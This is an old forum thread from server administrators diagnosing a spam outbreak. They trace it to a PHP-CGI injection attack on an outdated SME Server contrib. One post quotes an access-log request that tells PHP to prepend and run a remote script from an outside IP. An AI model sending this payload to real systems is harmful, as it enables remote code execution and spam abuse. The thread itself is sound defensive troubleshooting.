Topic: Thousands of Failure Notice Messages - Help

[Smitro]

Hi,

it would appear that my server is being used for spam, as I'm getting thousands of failure notices come back to the account "anonymous@mydomain". The message that was trying to send was viruses and all sorts of spam. After reading the failure message I'm pretty sure the message is coming from my server.

I can see a stack of messages in /var/log/qpsmtpd/current, but I'm not sure how they are originating. Can someone help me, where else can I look?

Here is an example of then log:
2012-05-26 03:55:07.382094500 440 Accepted connection 0/40 from 114.44.101.166 / 114-44-101-166.dynamic.hinet.net
2012-05-26 03:55:07.382421500 440 Connection from 114-44-101-166.dynamic.hinet.net [114.44.101.166]
2012-05-26 03:55:07.383756500 440 running plugin (set_hooks): peers
2012-05-26 03:55:07.387229500 440 peers hooking valid_auth
2012-05-26 03:55:07.387433500 440 peers hooking set_hooks
2012-05-26 03:55:07.388470500 440 logging::logterse hooking queue
2012-05-26 03:55:07.388717500 440 logging::logterse hooking deny
2012-05-26 03:55:07.389495500 440 tls plugin (init): ciphers: ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM
2012-05-26 03:55:07.391418500 440 tls hooking connect
2012-05-26 03:55:07.391579500 440 tls hooking ehlo
2012-05-26 03:55:07.391697500 440 tls hooking helo
2012-05-26 03:55:07.391923500 440 tls hooking rcpt
2012-05-26 03:55:07.392044500 440 tls hooking mail
2012-05-26 03:55:07.392175500 440 tls hooking data
2012-05-26 03:55:07.392381500 440 tls hooking post-connection
2012-05-26 03:55:07.392506500 440 tls hooking unrecognized_command
2012-05-26 03:55:07.395020500 440 check_earlytalker hooking connect
2012-05-26 03:55:07.395170500 440 check_earlytalker hooking data
2012-05-26 03:55:07.395636500 440 count_unrecognized_commands hooking connect
2012-05-26 03:55:07.396129500 440 count_unrecognized_commands hooking unrecognized_command
2012-05-26 03:55:07.396670500 440 check_relay hooking connect
2012-05-26 03:55:07.397503500 440 check_norelay hooking connect
2012-05-26 03:55:07.398531500 440 require_resolvable_fromhost hooking mail
2012-05-26 03:55:07.399577500 440 check_basicheaders hooking data_post
2012-05-26 03:55:07.400497500 440 check_badmailfrom hooking rcpt
2012-05-26 03:55:07.400649500 440 check_badmailfrom hooking mail
2012-05-26 03:55:07.401463500 440 check_badrcptto_patterns hooking rcpt
2012-05-26 03:55:07.402271500 440 check_badrcptto hooking rcpt
2012-05-26 03:55:07.402904500 440 check_spamhelo hooking ehlo
2012-05-26 03:55:07.403033500 440 check_spamhelo hooking helo
2012-05-26 03:55:07.404258500 440 check_goodrcptto hooking rcpt
2012-05-26 03:55:07.404820500 440 rcpt_ok hooking rcpt
2012-05-26 03:55:07.406106500 440 virus::pattern_filter hooking data_post
2012-05-26 03:55:07.407008500 440 tnef2mime hooking data_post
2012-05-26 03:55:07.407780500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408145500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408264500 440 spamassassin hooking data_post
2012-05-26 03:55:07.408976500 440 virus::clamav hooking data_post
2012-05-26 03:55:07.410229500 440 queue::qmail_2dqueue hooking queue
2012-05-26 03:55:07.411386500 440 Plugin peers, hook set_hooks returned DECLINED,
2012-05-26 03:55:07.411678500 440 running plugin (connect): tls
2012-05-26 03:55:07.411864500 440 Plugin tls, hook connect returned DECLINED,
2012-05-26 03:55:07.411931500 440 running plugin (connect): check_earlytalker
2012-05-26 03:55:08.412203500 440 check_earlytalker plugin (connect): remote host said nothing spontaneous, proceeding
2012-05-26 03:55:08.412410500 440 Plugin check_earlytalker, hook connect returned DECLINED,
2012-05-26 03:55:08.412486500 440 running plugin (connect): count_unrecognized_commands
2012-05-26 03:55:08.412672500 440 Plugin count_unrecognized_commands, hook connect returned DECLINED,
2012-05-26 03:55:08.412738500 440 running plugin (connect): check_relay
2012-05-26 03:55:08.413013500 440 trying to get config for relayclients
2012-05-26 03:55:08.414290500 440 trying to get config for morerelayclients
2012-05-26 03:55:08.414718500 440 Plugin check_relay, hook connect returned DECLINED,
2012-05-26 03:55:08.414791500 440 running plugin (connect): check_norelay
2012-05-26 03:55:08.414925500 440 trying to get config for norelayclients
2012-05-26 03:55:08.415619500 440 Plugin check_norelay, hook connect returned DECLINED,
2012-05-26 03:55:08.415789500 440 trying to get config for smtpgreeting
2012-05-26 03:55:08.416263500 440 220 box1.mailoz.com ESMTP
2012-05-26 03:55:08.416452500 440 trying to get config for timeoutsmtpd
2012-05-26 03:55:09.949349500 440 dispatching HELO 203.45.106.155
2012-05-26 03:55:09.950107500 440 running plugin (helo): tls
2012-05-26 03:55:09.950330500 440 Plugin tls, hook helo returned DECLINED,
2012-05-26 03:55:09.950401500 440 running plugin (helo): check_spamhelo
2012-05-26 03:55:09.950534500 440 trying to get config for badhelo
2012-05-26 03:55:09.951396500 440 Plugin check_spamhelo, hook helo returned DECLINED,
2012-05-26 03:55:09.951651500 440 trying to get config for me
2012-05-26 03:55:09.952099500 440 250 mailoz.com Hi 114-44-101-166.dynamic.hinet.net [114.44.101.166]; I am so happy to meet you.
2012-05-26 03:55:10.895886500 440 dispatching MAIL FROM: <k8fj899@kiss99.com>
2012-05-26 03:55:10.896599500 440 full from_parameter: FROM: <k8fj899@kiss99.com>
2012-05-26 03:55:10.897117500 440 from email address : [<k8fj899@kiss99.com>]
2012-05-26 03:55:10.898257500 440 running plugin (mail): tls
2012-05-26 03:55:10.898488500 440 Plugin tls, hook mail returned DECLINED,
2012-05-26 03:55:10.898557500 440 running plugin (mail): require_resolvable_fromhost
2012-05-26 03:55:10.898741500 440 trying to get config for invalid_resolvable_fromhost
2012-05-26 03:55:10.900724500 440 trying to get config for require_resolvable_fromhost
2012-05-26 03:55:12.257707500 440 Plugin require_resolvable_fromhost, hook mail returned DECLINED,
2012-05-26 03:55:12.257775500 440 running plugin (mail): check_badmailfrom
2012-05-26 03:55:12.257970500 440 trying to get config for badmailfrom
2012-05-26 03:55:12.258765500 440 Plugin check_badmailfrom, hook mail returned DECLINED,
2012-05-26 03:55:12.259036500 440 getting mail from <k8fj899@kiss99.com>
2012-05-26 03:55:12.259188500 440 250 <k8fj899@kiss99.com>, sender OK - how exciting to get mail from you!
2012-05-26 03:55:12.784869500 440 dispatching RCPT TO: <smtp@k888.tw>
2012-05-26 03:55:12.785552500 440 to email address : [<smtp@k888.tw>]
2012-05-26 03:55:12.786020500 440 running plugin (rcpt): tls
2012-05-26 03:55:12.786226500 440 Plugin tls, hook rcpt returned DECLINED,
2012-05-26 03:55:12.786296500 440 running plugin (rcpt): check_badmailfrom
2012-05-26 03:55:12.786434500 440 Plugin check_badmailfrom, hook rcpt returned DECLINED,
2012-05-26 03:55:12.786499500 440 running plugin (rcpt): check_badrcptto_patterns
2012-05-26 03:55:12.786656500 440 trying to get config for badrcptto_patterns
2012-05-26 03:55:12.787795500 440 Plugin check_badrcptto_patterns, hook rcpt returned DECLINED,
2012-05-26 03:55:12.787866500 440 running plugin (rcpt): check_badrcptto
2012-05-26 03:55:12.788010500 440 trying to get config for badrcptto
2012-05-26 03:55:12.800894500 440 Plugin check_badrcptto, hook rcpt returned DECLINED,
2012-05-26 03:55:12.800967500 440 running plugin (rcpt): check_goodrcptto
2012-05-26 03:55:12.801176500 440 check_goodrcptto plugin (rcpt): stripping '-' extensions
2012-05-26 03:55:12.801279500 440 trying to get config for goodrcptto
2012-05-26 03:55:12.903460500 440 check_goodrcptto plugin (rcpt): address includes extn '-', checking users: smtp
2012-05-26 03:55:12.955340500 440 check_goodrcptto plugin (rcpt): recipient smtp@k888.tw denied
2012-05-26 03:55:12.957681500 440 Plugin check_goodrcptto, hook rcpt returned DENY, relaying denied smtp@k888.tw
2012-05-26 03:55:12.960785500 440 logging::logterse plugin (deny): ` 114.44.101.166   114-44-101-166.dynamic.hinet.net   203.45.106.155   <k8fj899@kiss99.com>      check_goodrcptto   901   relaying denied smtp@k888.tw   msg denied before queued
2012-05-26 03:55:12.961165500 440 550 relaying denied smtp@k888.tw
2012-05-26 03:55:13.568516500 440 running plugin (post-connection): tls
2012-05-26 03:55:13.568943500 440 Plugin tls, hook post-connection returned DECLINED,
2012-05-26 03:55:14.274052500 4225 cleaning up after 440
2012-05-26 03:55:22.921307500 4225 running plugin (pre-connection): hosts_allow
2012-05-26 03:55:22.921653500 4225 Plugin hosts_allow, hook pre-connection returned DECLINED,

I'm sure I've probably done something wrong... just not sure what...

I've checked for an open relay and all tests say the server is not.

[CharlieBrady]

it would appear that my server is being used for spam, as I'm getting thousands of failure notices come back to the account "anonymous@mydomain".

Well, that is interesting, but it would be more interesting if you actually told us more about those failure notices.

The message that was trying to send was viruses and all sorts of spam.

The most likely cause of that is a workstation on you LAN running Windows and being infected my malware. You need to identify that workstation, disconnect it, and fix it (e.g. you could replace it by a Mac or a linux system).

After reading the failure message I'm pretty sure the message is coming from my server.

Since you haven't shown us a failure message we cannot confirm that for you.

I can see a stack of messages in /var/log/qpsmtpd/current, but I'm not sure how they are originating. Can someone help me, where else can I look?

Here is an example of then log:

That just shows a spammer(at 114-44-101-166.dynamic.hinet.net [114.44.101.166]) trying to relay via your server and being told to go away. Not relevant.

[pcowley]

I too am having similar problems.

I don't have any windows PC attached to my network and it appears from what I have found to be a php injection attack.  It appears to cause a text file with a huge number of email addresses to be read and an email with a virus attached sent to each one. Since the vast majority of the email addresses are bogus most come back as failures.

Here is what I find in the http/access log file

xxx.org  213.152.180.178 - - [26/May/2012:19:12:18 +1200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7338 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0"

I also found what appears to be a very dubious scrip called image.php in the uploaded directory to one on my websites that allows files to be uploaded.  the .ntaccess did not have a block in it to prohibit the uploading of php files at the time.

In the mail log file (sendmail style log) for every bogus email there is a line like this:


1337959090.848407500 qp 8657: to=remote.richardshelley9066@comcast.net, uid=102, ddelay=4901.358381, xdelay=1.110359, stat=Deferred (Connected_to_68.87.26.147_but_greeting_failed./Remote_host_said:_554_imta27.westchester.pa.mail.comcast.net_comcast_203.97.110.170_found_on_one_or_more_DNSBLs,_see_http://postmaster.comcast.net/smtp-error-codes.php#BL000010/)

Note the UID is 102 for WWW which infers it is coming from the webserver and the php code above seems to clearly confirm it.

All the websites that were used (and there seems to be about 3) are running a CMS under php5 (even though I am still on smeserver 7.5.1 - I have the PHP5 contrib installed)

I'd really like to know how to plug whatever hold this is.

Can anyone help.  My Linux skills are intermediate.

Cheers
Pete

[janet]

pcowley

I am still on smeserver 7.5.1 - I have the PHP5 contrib installed
I'd really like to know how to plug whatever hold this is.

Well that contrib has a security problem, that may be why.
See
http://forums.contribs.org/index.php/topic,48612.0.html

As far as fixing your broken system, you may need to reinstall a fresh (blank) sme operating system and then restore from a known good backup (pre hack), unless you have the troubleshooting skills to track down and remove all hacks.

[pcowley]

Hi Mary

Thanks for putting me on to that! 

I desperately want to upgrade to 8 when it comes out - hopefully really soon.  In the mean time I am applying the .htaccess patches to the websites that are running php5

Cheers
Pete

[TerryF]

I desperately want to upgrade to 8 when it comes out - hopefully really soon.

Its on the mirrors now..have now installed twice, all good..

[cactus]

Here is what I find in the http/access log file

xxx.org  213.152.180.178 - - [26/May/2012:19:12:18 +1200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7338 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0"

Someone for sure is trying to exploit your PHP installation on your server by means of shell shovelling.
The method used does only work if you have PHP configured in CGI mode, which is what is done by the php5-cgi contrib. I seriously advise you to disable the affected ibays and to remove the php5-cgi contrib.

If you need PHP5 you should now be able to upgrade to SME Server 8, which natively has PHP5 included.

[cactus]

I rasied a bug against the php5-cgi contrib, IMHO it should be removed from the repositories to prevent others from having security breaches like yours, see http://bugs.contribs.org/show_bug.cgi?id=6935

[Smitro]

You know, I think you've hit the nail on the head. I've seen that exact line in the http access log file and thought it looked bad, but could not find any more info as to what effect it had. My hope was that it was no more than a failed attempt. Obviously not.

I'm in the same boat as pcowley, I've been hanging out for SME 8, but thought I better wait for it to be in production before upgrading. I guess all I'm waiting for is the ok from the developers.

[CharlieBrady]

I rasied a bug against the php5-cgi contrib, IMHO it should be removed from the repositories to prevent others from having security breaches like yours, see http://bugs.contribs.org/show_bug.cgi?id=6935

Perhaps it should be replaced in the repositories with an empty rpm. Or maybe they have come out with a proper fix now, and the contrib can be fixed. One would hope that whoever is maintaining that contrib takes a problem like this seriously and deals with the problem diligently.

[Smitro]

Just realised after my last post that 8.0 has just been released! Hooray! I'm going to buy some new hardware then make the move!

I'd never say a bad word about SME, but PHP5 was long overdue. Thanks.